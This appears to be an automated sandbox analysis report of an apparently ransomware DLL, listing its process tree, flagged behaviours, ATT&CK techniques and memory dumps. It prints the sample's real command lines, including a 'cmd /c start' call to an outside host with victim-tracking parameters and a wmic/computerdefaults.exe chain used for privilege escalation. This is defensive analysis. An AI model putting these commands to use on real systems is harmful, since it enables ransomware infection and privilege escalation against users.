PID 1264 wrote to memory of 2388	1264	cmd.exe	88
PID 1328 wrote to memory of 3772	1328	cmd.exe	89
PID 1328 wrote to memory of 3772	1328	cmd.exe	89
PID 4232 wrote to memory of 4300	4232	MicrosoftEdgeCP.exe	94
PID 4232 wrote to memory of 4300	4232	MicrosoftEdgeCP.exe	94
PID 4232 wrote to memory of 4300	4232	MicrosoftEdgeCP.exe	94
PID 4232 wrote to memory of 4300	4232	MicrosoftEdgeCP.exe	94

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\3154ded31015965d68a48be47f904ef6.dll,#1
1⤵
- Modifies extensions of user files
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3132
- C:\Windows\system32\notepad.exe
  notepad.exe C:\Users\Public\readme.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:1744
- C:\Windows\system32\cmd.exe
  cmd /c "start http://80b40a8014b06a30fxocpbvek.loglook.club/xocpbvek^&1^&46497082^&84^&293^&2215063"
  2⤵
  - Checks computer location settings
  PID:3064
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2296
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1928
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3036
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3668

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1328
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:3772

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1264
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:2388

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:364

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:2096

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4232

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:4300

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4624

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4800

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4888

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/3132-117-0x0000020C6C9E0000-0x0000020C6C9E1000-memory.dmp

Filesize
4KB

Download
memory/3132-116-0x0000020C6C9D0000-0x0000020C6C9D1000-memory.dmp

Filesize
4KB

Download
memory/3132-124-0x0000020C6CA70000-0x0000020C6CA71000-memory.dmp

Filesize
4KB

Download
memory/3132-125-0x0000020C6D170000-0x0000020C6D171000-memory.dmp

Filesize
4KB

Download
memory/3132-126-0x0000020C6D180000-0x0000020C6D184000-memory.dmp

Filesize
16KB

Download
memory/3132-119-0x0000020C6CA00000-0x0000020C6CA01000-memory.dmp

Filesize
4KB

Download
memory/3132-118-0x0000020C6C9F0000-0x0000020C6C9F1000-memory.dmp

Filesize
4KB

Download
memory/3132-122-0x0000020C6CA50000-0x0000020C6CA51000-memory.dmp

Filesize
4KB

Download
memory/3132-120-0x0000020C6CA10000-0x0000020C6CA11000-memory.dmp

Filesize
4KB

Download
memory/3132-121-0x0000020C6CA40000-0x0000020C6CA41000-memory.dmp

Filesize
4KB

Download
memory/3132-115-0x0000020C6C5F0000-0x0000020C6C5F1000-memory.dmp

Filesize
4KB

Download
memory/3132-123-0x0000020C6CA60000-0x0000020C6CA61000-memory.dmp

Filesize
4KB

Download
memory/3132-134-0x0000020C6ECA0000-0x0000020C6ECA1000-memory.dmp

Filesize
4KB

Download
memory/3132-114-0x0000020C6C5E0000-0x0000020C6C5E1000-memory.dmp

Filesize
4KB

Download
memory/3764-137-0x00000206B9D40000-0x00000206B9D48000-memory.dmp

Filesize
32KB

Download
memory/3764-140-0x00000206B9BF0000-0x00000206B9BF8000-memory.dmp

Filesize
32KB

Download
memory/3764-141-0x00000206B9AE0000-0x00000206B9AE1000-memory.dmp

Filesize
4KB

Download
memory/3764-142-0x00000206B9F40000-0x00000206B9F48000-memory.dmp

Filesize
32KB

Download
memory/3764-143-0x00000206B9BB0000-0x00000206B9BB1000-memory.dmp

Filesize
4KB

Download